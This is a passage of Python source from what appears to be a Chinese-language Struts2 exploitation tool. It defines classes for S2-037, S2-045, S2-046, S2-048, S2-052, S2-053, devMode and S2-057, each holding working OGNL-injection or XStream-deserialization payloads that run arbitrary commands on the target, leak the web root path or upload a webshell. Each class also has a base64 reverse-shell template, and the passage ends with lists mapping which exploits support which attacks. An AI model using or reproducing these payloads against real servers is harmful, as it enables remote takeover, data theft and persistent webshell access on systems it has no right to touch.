 932 |         elif html == "1008660253718":
 933 |             self.is_vul = True
 934 |             return 'S2-033'
 935 |         return self.is_vul
 936 | 
 937 |     def exec_cmd(self, cmd):
 938 |         """执行命令"""
 939 |         payload = self.exec_payload.format(cmd=quote(cmd))
 940 |         html = get_stream(self.url + payload, self.headers, self.encoding)
 941 |         return html
 942 | 
 943 |     def reverse_shell(self, ip, port):
 944 |         """反弹shell"""
 945 |         html = reverse_shell(self, ip, port)
 946 |         return html
 947 | 
 948 | 
 949 | class S2_037:
 950 |     """S2-037漏洞检测利用类"""
 951 |     info = "[+] S2-037:影响版本Struts 2.3.20-2.3.28.1; GET请求发送数据; 支持获取WEB路径,任意命令执行和反弹shell"
 952 |     web_path = "%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f"
 953 |     exec_payload = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command={cmd}"
 954 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 955 | 
 956 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 957 |         if url.endswith('/'):
 958 |             self.url = url
 959 |         else:
 960 |             self.url = url + '/'
 961 |         self.headers = parse_headers(headers)
 962 |         self.encoding = encoding
 963 |         self.is_vul = False
 964 | 
 965 |     def check(self):
 966 |         """选择可以利用成功的payload"""
 967 |         html = echo_check(self)
 968 |         if str(html).startswith("ERROR:"):
 969 |             return html
 970 |         if html:
 971 |             self.is_vul = True
 972 |             return 'S2-037'
 973 |         return self.is_vul
 974 | 
 975 |     def get_path(self):
 976 |         """获取web目录"""
 977 |         html = get(self.url + self.web_path, self.headers, self.encoding)
 978 |         return html
 979 | 
 980 |     def exec_cmd(self, cmd):
 981 |         """执行命令"""
 982 |         payload = self.exec_payload.format(cmd=quote(cmd))
 983 |         html = get_stream(self.url + payload, self.headers, self.encoding)
 984 |         return html
 985 | 
 986 |     def reverse_shell(self, ip, port):
 987 |         """反弹shell"""
 988 |         html = reverse_shell(self, ip, port)
 989 |         return html
 990 | 
 991 | 
 992 | class S2_045:
 993 |     """S2-045漏洞检测利用类"""
 994 |     info = "[+] S2-045:影响版本Struts 2.3.5-2.3.31,2.5-2.5.10; POST请求发送数据,不需要参数; 支持获取WEB路径,任意命令执行,反弹shell和文件上传"
 995 |     web_path = r"""%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath("/"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"""
 996 |     exec_payload = r"""%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='CMD').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"""
 997 |     upload_payload = r"""%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#fos= new java.io.FileOutputStream(#req.getParameter("f")),#fos.write(#req.getParameter("t").getBytes()),#fos.close()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println("OK"),(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())))}"""
 998 |     shell = "{echo,SHELL}|{base64,-d}|{bash,-i}"
 999 | 
1000 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
1001 |         self.url = url
1002 |         self.headers = parse_headers(headers)
1003 |         self.encoding = encoding
1004 |         self.data = data
1005 |         self.is_vul = False
1006 | 
1007 |     def check(self):
1008 |         """检测漏洞是否存在"""
1009 |         html = echo_check(self)
1010 |         if str(html).startswith("ERROR:"):
1011 |             return html
1012 |         if html:
1013 |             self.is_vul = True
1014 |             return 'S2-045'
1015 |         return self.is_vul
1016 | 
1017 |     def get_path(self):
1018 |         """获取web目录"""
1019 |         self.headers['Content-Type'] = self.web_path
1020 |         html = post(self.url, self.data, self.headers, self.encoding)
1021 |         return html
1022 | 
1023 |     def exec_cmd(self, cmd):
1024 |         """执行命令"""
1025 |         self.headers['Content-Type'] = self.exec_payload.replace('CMD', cmd)
1026 |         html = post_stream(self.url, self.data, self.headers, self.encoding)
1027 |         return html
1028 | 
1029 |     def reverse_shell(self, ip, port):
1030 |         """反弹shell"""
1031 |         html = reverse_shell(self, ip, port)
1032 |         return html
1033 | 
1034 |     def upload_shell(self, upload_path, shell_path):
1035 |         shell = read_file(shell_path, self.encoding)
1036 |         data = "?t={shell}&f={path}".format(shell=quote(shell), path=upload_path)
1037 |         self.headers['Content-Type'] = self.upload_payload
1038 |         html = post(self.url + data, self.data, self.headers, self.encoding)
1039 |         if html == 'OK':
1040 |             return True
1041 |         else:
1042 |             return False
1043 | 
1044 | 
1045 | class S2_046:
1046 |     """S2-046漏洞检测利用类"""
1047 |     info = "[+] S2-046:影响版本Struts 2.3.5-2.3.31,2.5-2.5.10; POST请求发送数据,不需要参数; 支持获取WEB路径,任意命令执行,反弹shell和文件上传"
1048 |     web_path = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#res.getWriter().print('')).(#res.getWriter().print('')).(#res.getWriter().print(#req.getSession().getServletContext().getRealPath('/'))).(#res.getWriter().flush()).(#res.getWriter().close())}\0b"
1049 |     check_poc = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#res.getWriter().print('security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b"
1050 |     exec_payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('CMD'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}\0b"
1051 |     upload_paylaod = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#filecontent='SHELL').(new java.io.BufferedWriter(new java.io.FileWriter('PATH')).append(new java.net.URLDecoder().decode(#filecontent,'ENCODING')).close()).(#res.getWriter().print('O')).(#res.getWriter().print('K')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}\0b"
1052 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
1053 | 
1054 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
1055 |         self.url = url
1056 |         self.headers = parse_headers(headers)
1057 |         self.encoding = encoding
1058 |         self.is_vul = False
1059 | 
1060 |     def check(self):
1061 |         """检测漏洞是否存在"""
1062 |         files = {'test': (self.check_poc.replace('ENCODING', self.encoding), b'x', 'text/plain')}
1063 |         html = post(self.url, files=files, encoding=self.encoding)
1064 |         if html.startswith("ERROR:"):
1065 |             return html
1066 |         elif html == 'security_check':
1067 |             self.is_vul = True
1068 |             return 'S2-046'
1069 |         return self.is_vul
1070 | 
1071 |     def get_path(self):
1072 |         """获取web目录"""
1073 |         files = {'test': (self.web_path.replace('ENCODING', self.encoding), b'x', 'text/plain')}
1074 |         html = post(self.url, files=files, encoding=self.encoding)
1075 |         return html
1076 | 
1077 |     def exec_cmd(self, cmd):
1078 |         """执行命令"""
1079 |         paylaod = self.exec_payload.replace('CMD', cmd).replace('ENCODING', self.encoding)
1080 |         html = post_file(self.url, paylaod, self.headers, self.encoding)
1081 |         return html
1082 | 
1083 |     def reverse_shell(self, ip, port):
1084 |         """反弹shell"""
1085 |         html = reverse_shell(self, ip, port)
1086 |         return html
1087 | 
1088 |     def upload_shell(self, upload_path, shell_path):
1089 |         shell = read_file(shell_path, self.encoding)
1090 |         files = {'test': (
1091 |             self.upload_paylaod.replace('SHELL', quote(shell)).replace('PATH', upload_path).replace('ENCODING',
1092 |                                                                                                     self.encoding),
1093 |             b'x',
1094 |             'text/plain')}
1095 |         html = post(self.url, files=files, encoding=self.encoding)
1096 |         if html == 'OK':
1097 |             return True
1098 |         else:
1099 |             return False
1100 | 
1101 | 
1102 | class S2_048:
1103 |     """S2-048漏洞检测利用类"""
1104 |     info = "[+] S2-048:影响版本Struts 2.3.x with Struts 1 plugin and Struts 1 action; POST请求发送数据; 默认参数为:username,password; 支持任意命令执行和反弹shell"
1105 |     check_poc = "%24%7B{num1}%2B{num2}%7D"
1106 |     exec_payload = "%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream())).(%23q)%7D"
1107 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
1108 | 
1109 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
1110 |         self.url = url
1111 |         if not data:
1112 |             self.data = "username=test&password={exp}"
1113 |         else:
1114 |             self.data = data
1115 |         self.headers = parse_headers(headers)
1116 |         self.encoding = encoding
1117 |         self.is_vul = False
1118 |         if 'Content-Type' not in self.headers:
1119 |             self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
1120 | 
1121 |     def check(self):
1122 |         """检测漏洞是否存在"""
1123 |         num1 = random.randint(10000, 100000)
1124 |         num2 = random.randint(10000, 100000)
1125 |         poc = self.check_poc.format(num1=num1, num2=num2)
1126 |         data = self.data.format(exp=poc)
1127 |         html = post_stream(self.url, data, self.headers, self.encoding)
1128 |         nn = str(num1 + num2)
1129 |         if html.startswith("ERROR:"):
1130 |             return html
1131 |         elif nn in html:
1132 |             self.is_vul = True
1133 |             return 'S2-048'
1134 |         return self.is_vul
1135 | 
1136 |     def exec_cmd(self, cmd):
1137 |         """执行命令"""
1138 |         data = self.data.format(exp=self.exec_payload.format(cmd=quote(cmd)))
1139 |         html = post(self.url, data, self.headers, self.encoding)
1140 |         return html
1141 | 
1142 |     def reverse_shell(self, ip, port):
1143 |         """反弹shell"""
1144 |         html = reverse_shell(self, ip, port)
1145 |         return html
1146 | 
1147 | 
1148 | class S2_052:
1149 |     """S2-052漏洞检测利用类"""
1150 |     info = "[+] S2-052:影响版本Struts 2.1.2-2.3.33,2.5-2.5.12; POST请求发送数据,不需要参数; 支持任意命令执行(无回显)和反弹shell,不支持检测该漏洞是否存在"
1151 |     exec_payload = """<map>
1152 |   <entry>
1153 |     <jdk.nashorn.internal.objects.NativeString>
1154 |       <flags>0</flags>
1155 |       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
1156 |         <dataHandler>
1157 |           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
1158 |             <is class="javax.crypto.CipherInputStream">
1159 |               <cipher class="javax.crypto.NullCipher">
1160 |                 <initialized>false</initialized>
1161 |                 <opmode>0</opmode>
1162 |                 <serviceIterator class="javax.imageio.spi.FilterIterator">
1163 |                   <iter class="javax.imageio.spi.FilterIterator">
1164 |                     <iter class="java.util.Collections$EmptyIterator"/>
1165 |                     <next class="java.lang.ProcessBuilder">
1166 |                       <command>
1167 |                         {cmd}
1168 |                       </command>
1169 |                       <redirectErrorStream>false</redirectErrorStream>
1170 |                     </next>
1171 |                   </iter>
1172 |                   <filter class="javax.imageio.ImageIO$ContainsFilter">
1173 |                     <method>
1174 |                       <class>java.lang.ProcessBuilder</class>
1175 |                       <name>start</name>
1176 |                       <parameter-types/>
1177 |                     </method>
1178 |                     <name>foo</name>
1179 |                   </filter>
1180 |                   <next class="string">foo</next>
1181 |                 </serviceIterator>
1182 |                 <lock/>
1183 |               </cipher>
1184 |               <input class="java.lang.ProcessBuilder$NullInputStream"/>
1185 |               <ibuffer></ibuffer>
1186 |               <done>false</done>
1187 |               <ostart>0</ostart>
1188 |               <ofinish>0</ofinish>
1189 |               <closed>false</closed>
1190 |             </is>
1191 |             <consumed>false</consumed>
1192 |           </dataSource>
1193 |           <transferFlavors/>
1194 |         </dataHandler>
1195 |         <dataLen>0</dataLen>
1196 |       </value>
1197 |     </jdk.nashorn.internal.objects.NativeString>
1198 |     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
1199 |   </entry>
1200 |   <entry>
1201 |     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
1202 |     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
1203 |   </entry>
1204 | </map>"""
1205 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
1206 | 
1207 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
1208 |         self.url = url
1209 |         self.headers = parse_headers(headers)
1210 |         self.encoding = encoding
1211 |         self.is_vul = False
1212 |         if 'Content-Type' not in self.headers:
1213 |             self.headers['Content-Type'] = 'application/xml'
1214 | 
1215 |     def exec_cmd(self, cmd):
1216 |         """执行命令"""
1217 |         cmd = parse_cmd(cmd, type='xml')
1218 |         data = self.exec_payload.format(cmd=cmd)
1219 |         html = post(self.url, data, self.headers, self.encoding)
1220 |         return html
1221 | 
1222 |     def reverse_shell(self, ip, port):
1223 |         """反弹shell"""
1224 |         html = reverse_shell(self, ip, port)
1225 |         return html
1226 | 
1227 | 
1228 | class S2_053:
1229 |     """S2-053漏洞检测利用类"""
1230 |     info = "[+] S2-053:影响版本Struts 2.0.1-2.3.33,2.5-2.5.10; POST请求发送数据; 默认参数为:username,password; 支持任意命令执行和反弹shell"
1231 |     check_poc = "%25%7B{num1}%2B{num2}%7D"
1232 |     exec_payload = "%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D'{cmd}').(%23iswin%3D(%40java.lang.System%40getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3D(%23iswin%3F%7B'cmd.exe'%2C'%2Fc'%2C%23cmd%7D%3A%7B'%2Fbin%2Fbash'%2C'-c'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0A"
1233 |     shell = "{echo,SHELL}|{base64,-d}|{bash,-i}"
1234 | 
1235 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
1236 |         self.url = url
1237 |         if not data:
1238 |             self.data = "username=test&password={exp}"
1239 |         else:
1240 |             self.data = data
1241 |         self.headers = parse_headers(headers)
1242 |         self.encoding = encoding
1243 |         self.is_vul = False
1244 |         if 'Content-Type' not in self.headers:
1245 |             self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
1246 | 
1247 |     def check(self):
1248 |         """检测漏洞是否存在"""
1249 |         num1 = random.randint(10000, 100000)
1250 |         num2 = random.randint(10000, 100000)
1251 |         poc = self.check_poc.format(num1=num1, num2=num2)
1252 |         data = self.data.format(exp=poc)
1253 |         html = post_stream(self.url, data, self.headers, self.encoding)
1254 |         nn = str(num1 + num2)
1255 |         if html.startswith("ERROR:"):
1256 |             return html
1257 |         elif nn in html:
1258 |             self.is_vul = True
1259 |             return 'S2-053'
1260 |         return self.is_vul
1261 | 
1262 |     def exec_cmd(self, cmd):
1263 |         """执行命令"""
1264 |         data = self.data.format(exp=self.exec_payload.format(cmd=quote(cmd)))
1265 |         html = post(self.url, data, self.headers, self.encoding)
1266 |         return html
1267 | 
1268 |     def reverse_shell(self, ip, port):
1269 |         """反弹shell"""
1270 |         html = reverse_shell(self, ip, port)
1271 |         return html
1272 | 
1273 | 
1274 | class S2_devMode:
1275 |     """S2-devMode漏洞检测利用类"""
1276 |     info = "[+] S2-devMode:影响版本Struts 2.1.0-2.3.1; GET请求发送数据; 支持获取WEB路径,任意命令执行和反弹shell"
1277 |     web_path = "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest"
1278 |     exec_payload = "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command={cmd}"
1279 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
1280 | 
1281 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
1282 |         self.url = url
1283 |         self.headers = parse_headers(headers)
1284 |         self.encoding = encoding
1285 |         self.is_vul = False
1286 | 
1287 |     def check(self):
1288 |         """检测漏洞是否存在"""
1289 |         html = echo_check(self)
1290 |         if str(html).startswith("ERROR:"):
1291 |             return html
1292 |         if html:
1293 |             self.is_vul = True
1294 |             return 'S2-devMode'
1295 |         return self.is_vul
1296 | 
1297 |     def get_path(self):
1298 |         """获取web目录"""
1299 |         html = get(self.url + self.web_path, self.headers, self.encoding)
1300 |         return html
1301 | 
1302 |     def exec_cmd(self, cmd):
1303 |         """执行命令"""
1304 |         html = get_stream(self.url + self.exec_payload.format(cmd=quote(cmd)), self.headers, self.encoding)
1305 |         return html
1306 | 
1307 |     def reverse_shell(self, ip, port):
1308 |         """反弹shell"""
1309 |         html = reverse_shell(self, ip, port)
1310 |         return html
1311 | 
1312 | 
1313 | class S2_057:
1314 |     """S2-057漏洞检测利用类"""
1315 |     info = "[+] S2-057:影响版本Struts 2.0.4-2.3.34, Struts 2.5.0-2.5.16; GET请求发送数据; 支持任意命令执行和反弹shell"
1316 |     check_poc = "%24%7BNUM1%2BNUM2%7D"
1317 |     exec_payload1 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
1318 |     exec_payload2 = "%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D"
1319 |     exec_payload3 = "%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D"
1320 |     exec_payload4 = "%24%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D"
1321 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
1322 | 
1323 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
1324 |         if url.endswith(".action"):
1325 |             rindex = url.rindex('/')
1326 |             self.url = url[:rindex + 1]
1327 |             self.name = url[rindex + 1:]
1328 |         elif url.endswith("/"):
1329 |             self.url = url
1330 |             self.name = "index.action"
1331 |         else:
1332 |             self.url = url + '/'
1333 |             self.name = "index.action"
1334 |         self.headers = parse_headers(headers)
1335 |         self.encoding = encoding
1336 |         self.is_vul = False
1337 | 
1338 |     def check(self):
1339 |         """检测漏洞是否存在"""
1340 |         num1 = random.randint(10000, 100000)
1341 |         num2 = random.randint(10000, 100000)
1342 |         poc = self.check_poc.replace("NUM1", str(num1)).replace("NUM2", str(num2))
1343 |         url = self.url + poc + "/" + self.name
1344 |         html = get_302(url, self.headers, self.encoding)
1345 |         if str(html).startswith("ERROR:"):
1346 |             return html
1347 |         if str(num1 + num2) in html:
1348 |             self.is_vul = True
1349 |             return 'S2-057'
1350 |         return self.is_vul
1351 | 
1352 |     def choice_exp(self):
1353 |         """选择可用的exp"""
1354 |         payloads = [self.exec_payload1, self.exec_payload2, self.exec_payload3, self.exec_payload4]
1355 |         hash_str = get_hash()
1356 |         for exp in payloads:
1357 |             payload = exp.format(cmd=quote("echo " + hash_str))
1358 |             url = self.url + payload + "/" + self.name
1359 |             html = get_302(url, self.headers, self.encoding)
1360 |             if hash_str in html:
1361 |                 return exp
1362 |         return "ERROR: 无可用Payload!"
1363 | 
1364 |     def exec_cmd(self, cmd):
1365 |         """执行命令"""
1366 |         exp = self.choice_exp()
1367 |         if exp.startswith('ERROR:'):
1368 |             return exp
1369 | 
1370 |         payload = exp.format(cmd=quote(cmd))
1371 |         url = self.url + payload + "/" + self.name
1372 |         html = get_302(url, self.headers, self.encoding)
1373 |         return html
1374 | 
1375 |     def reverse_shell(self, ip, port):
1376 |         """反弹shell"""
1377 |         html = reverse_shell(self, ip, port)
1378 |         return html
1379 | 
1380 | 
1381 | # 所有漏洞名称
1382 | s2_dict = {'S2_001': S2_001, 'S2_003': S2_003, 'S2_005': S2_005, 'S2_007': S2_007, 'S2_008': S2_008, 'S2_009': S2_009,
1383 |            'S2_012': S2_012, 'S2_013': S2_013, 'S2_015': S2_015, 'S2_016': S2_016, 'S2_019': S2_019, 'S2_029': S2_029,
1384 |            'S2_032': S2_032, 'S2_033': S2_033, 'S2_037': S2_037, 'S2_045': S2_045, 'S2_046': S2_046, 'S2_048': S2_048,
1385 |            'S2_052': S2_052, 'S2_053': S2_053, 'S2_devMode': S2_devMode, "S2_057": S2_057}
1386 | # S2-052不支持漏洞扫描和检查
1387 | s2_list = [S2_001, S2_003, S2_005, S2_007, S2_008, S2_009, S2_012, S2_013, S2_015, S2_016, S2_019,
1388 |            S2_029, S2_032, S2_033, S2_037, S2_045, S2_046, S2_048, S2_053, S2_devMode, S2_057]
1389 | # 支持获取WEB路径的漏洞名称列表
1390 | webpath_names = ["S2_001", "S2_005", "S2_013", "S2_016", "S2_019", "S2_032", "S2_037", "S2_045", "S2_046", "S2_devMode"]
1391 | # 支持命令执行的漏洞名称列表
1392 | exec_names = ["S2_001", "S2_003", "S2_005", "S2_007", "S2_008", "S2_009", "S2_013", "S2_015", "S2_016", "S2_019",
1393 |               "S2_029", "S2_032", "S2_033", "S2_037", "S2_045", "S2_046", "S2_048", "S2_052", "S2_052", "S2_devMode",
1394 |               "S2_057"]
1395 | # 支持反弹shell的漏洞名称列表
1396 | reverse_names = ["S2_001", "S2_007", "S2_008", "S2_009", "S2_013", "S2_015", "S2_016", "S2_019", "S2_029", "S2_032",
1397 |                  "S2_033", "S2_037", "S2_045", "S2_046", "S2_048", "S2_052", "S2_052", "S2_devMode", "S2_057"]
1398 | # 支持文件上传的漏洞名称列表
1399 | upload_names = ["S2_013", "S2_016", "S2_019", "S2_045", "S2_046"]
1400 | 
1401 | banner = """
1402 |  ____  _              _       ____    ____                  
